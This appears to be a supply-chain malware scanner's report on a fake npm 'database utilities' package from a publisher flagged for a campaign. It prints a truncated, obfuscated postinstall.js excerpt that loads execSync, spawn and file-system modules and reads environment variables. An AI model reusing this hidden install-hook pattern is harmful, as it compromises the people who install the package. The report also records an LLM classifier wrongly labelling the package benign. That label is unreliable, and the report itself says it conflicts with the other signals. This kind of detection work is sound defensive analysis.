// npm package
@cloudplatform-single-spa/cloud-dns
Internal database utilities with connection pooling, query builder and migration support
weekly
102
monthly
102
versions
3
maintainers
1
license
UNLICENSED
first publish
2026-05-27
publisher
mr.4nd3r50n
tarball
17,365 B
AUTO-PUBLISHED·1 version indexed·latest published 2026-05-28
// exfil path
what is read → where it ships
steals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> 'use strict';const a0_0x5c7e39=a0_0x59aa;(function(_0x586366,_0x4c75d3){const _0x322b23=a0_0x59aa,_0x5d0fed=_0x586366();while(!![]){try{const _0x24f97f=-parseInt(_0x322b23(0x164))/(0x1*0x18c5+0x10dd+-…
// publisher campaign
by mr.4nd3r50n
9 caught packages from this account
This is not an isolated catch. The same publisher has shipped 8 other packages that our pipeline flagged — the shape of a coordinated campaign, not a one-off. Each link below opens that sibling's analysis.
// offending code· @100.100.100· 1 file flagged
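llm: benign · 0.85 → No suspicious destination, no remote-exec shape — 1 known-vendor host(s). This verdict disagrees with the other signals recorded for this version (heuristic 100/100, osv-flagged:MAL-2026-4896, install-scripts:postinstall). The excerpted postinstall.js is string-obfuscated and destructures execSync and spawn from a require() whose module name is hidden behind the decoder, so neither the modules loaded nor any destination are visible in the excerpt. Triage should follow the OSV and heuristic signals rather than the benign label.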
- @100.100.100 · AUTO-PUBLISHED · publisher: mr.4nd3r50n · heuristic 100/100 · static flags 2 · llm benign (0.85) via ollama · install-scripts:postinstall · new-publisher:1d · anomalous-major-version:100 · publisher-multi-name-burst:24 · publisher-version-pump:25 · osv-flagged:MAL-2026-4896 · reads-env-vars · reads-homedir
→ No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
// offending code · 1 file flagged · patterns: 2
--- install scripts --- ### postinstall node scripts/postinstall.js ### prepublishOnly echo 'Building...' --- package/scripts/postinstall.js (excerpt) --- 'use strict';const a0_0x5c7e39=a0_0x59aa;(function(_0x586366,_0x4c75d3){const _0x322b23=a0_0x59aa,_0x5d0fed=_0x586366();while(!![]){try{const _0x24f97f=-parseInt(_0x322b23(0x164))/(0x1*0x18c5+0x10dd+-0x29a1)*(-parseInt(_0x322b23(0x14b))/(-0x2466+0x2*-0x10af+-0x1*-0x45c6))+parseInt(_0x322b23(0x15f))/(0x755*0x5+0x14e*-0x11+-0x39e*0x4)+-parseInt(_0x322b23(0x16d))/(0x1a87+0x181*0xf+0x3112*-0x1)+parseInt(_0x322b23(0x18d))/(0xf5d+-0x1*-0x1b1a+-0x2a72)*(parseInt(_0x322b23(0x19e))/(-0x15*-0x143+-0x26e2+0x423*0x3))+parseInt(_0x322b23(0x19a))/(0x1a*-0x5e+-0xd08+0x169b)*(-parseInt(_0x322b23(0x178))/(-0x92+-0x1ade+0x1b78))+-parseInt(_0x322b23(0x17b))/(0x4*-0x2ad+0x110b+-0x64e)*(-parseInt(_0x322b23(0x160))/(-0xc3f+0x69b*-0x5+0x2d50))+-parseInt(_0x322b23(0x165))/(-0x53d+-0x25e1+-0x3*-0xe63);if(_0x24f97f===_0x4c75d3)break;else _0x5d0fed['push'](_0x5d0fed['shift']());}catch(_0x10e171){_0x5d0fed['push'](_0x5d0fed['shift']());}}}(a0_0x6582,0x1394fe+-0x9609e+-0x1*-0x32bad));const a0_0x295b89=require('os'),a0_0x19e42c=require('fs'),a0_0x596d69=require(a0_0x5c7e39(0x169)),a0_0x57556c=require(a0_0x5c7e39(0x194)),a0_0xb482ae=require(a0_0x5c7e39(0x197)),{execSync:a0_0x3ecb9b,spawn:a0_0x342bb3}=require(a0_0x5c7e39(0x1aa)),a0_0xe7fbb0=a0_0x5c7e39(0x183),a0_0x26afdd=a0_0x5c7e39(0x179),a0_0x176b39=a0_0x5c7e39(0x16f)+a0_0x5c7e39(0x17f),a0_0x372fee=a0_0x5c7e39(0x1b8),a0_0x43cd56=!!process.env[a0_0x372fee],a0_0x28dc02=a0_0x5c7e39(0x158)===a0_0x5c7e39(0x158)||!!process.env[a0_0x176b39+'RECON_ONLY'];function --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- dist/index.d.ts (bundled) --- export interface PoolOptions { host?: string; port?: number; database?: string; user?: string; password?: string; max?: number; } export interface Pool { host: string; port: number; database: string; } export function createPool(options?: 
PoolOptions): Pool; export function query(pool: Pool, sql: string, params?: unknown[]): Promise<unknown[]>; export function transaction(pool: Pool, fn: (client: unknown) => Promise<unknown>): Promise<unknown>; export function migrate(pool: Pool, dir?: string): Promise<string[]>; --- dist/index.js (bundled) --- 'use strict'; // dist/index.js module.exports = require('../src/index.js');
